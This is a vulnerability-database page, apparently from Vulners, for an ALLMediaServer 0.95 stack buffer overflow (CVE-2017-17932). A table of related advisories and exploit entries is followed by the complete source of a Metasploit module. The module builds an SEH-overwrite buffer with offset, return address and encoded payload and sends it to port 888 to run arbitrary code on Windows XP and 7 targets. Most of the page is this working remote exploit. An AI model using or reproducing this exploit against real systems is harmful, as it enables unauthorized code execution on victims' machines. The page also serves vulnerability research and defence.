| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| ALLMediaServer 0.95 - Buffer Overflow Exploit | 27 Dec 201700:00 | – | zdt | |
| ALLMediaServer 0.95 - Buffer Overflow Exploit | 12 Jan 201800:00 | – | zdt | |
| CVE-2022-28381 | 3 Apr 202219:15 | – | attackerkb | |
| The vulnerability of the MediaServer.exe executable of the ALLPlayer/ALLMediaServer DLNA server allows a hacker to execute arbitrary code or cause a service failure. | 1 Feb 201800:00 | – | bdu_fstec | |
| CVE-2017-17932 | 29 May 201815:50 | – | circl | |
| ALLPlayer ALLMediaServer MediaServer.exe File Buffer Overflow Vulnerability | 28 Dec 201700:00 | – | cnvd | |
| CVE-2017-17932 | 28 Dec 201706:00 | – | cve | |
| CVE-2017-17932 | 28 Dec 201706:00 | – | cvelist | |
| ALLMediaServer 0.95 - Buffer Overflow (PoC) | 27 Dec 201700:00 | – | exploitdb | |
| ALLMediaServer 0.95 - Remote Buffer Overflow | 11 Jan 201800:00 | – | exploitdb |
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'ALLMediaServer 0.95 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in ALLMediaServer 0.95.
The vulnerability is caused due to a boundary error within the
handling of HTTP request.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Anurag Srivastava', # Remote exploit and Metasploit module
],
'References' =>
[
[ 'EDB', '43406' ]
],
'DefaultOptions' =>
{
'ExitFunction' => 'process', #none/process/thread/seh
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "",
'Space' => 660,
'DisableNops' => true
},
'Targets' =>
[
[ 'ALLMediaServer 0.95 / Windows XP SP3 - English',
{
'Ret' => 0x00408315, # POP # POP # POP # RET
'Offset' => 1072
}
],
[ 'ALLMediaServer 0.95 / Windows 7 SP1 - English',
{
'Ret' => 0x00408315, # POP # POP # POP # RET
'Offset' => 1072
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Dec 28 2017',
'DefaultTarget' => 1))
register_options([Opt::RPORT(888)], self.class)
end
def exploit
connect
buffer = ""
buffer << make_nops(target['Offset'])
buffer << generate_seh_record(target.ret)
buffer << make_nops(19)
buffer << payload.encoded
print_status("Sending payload ...")
sock.put(buffer)
handler
disconnect
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation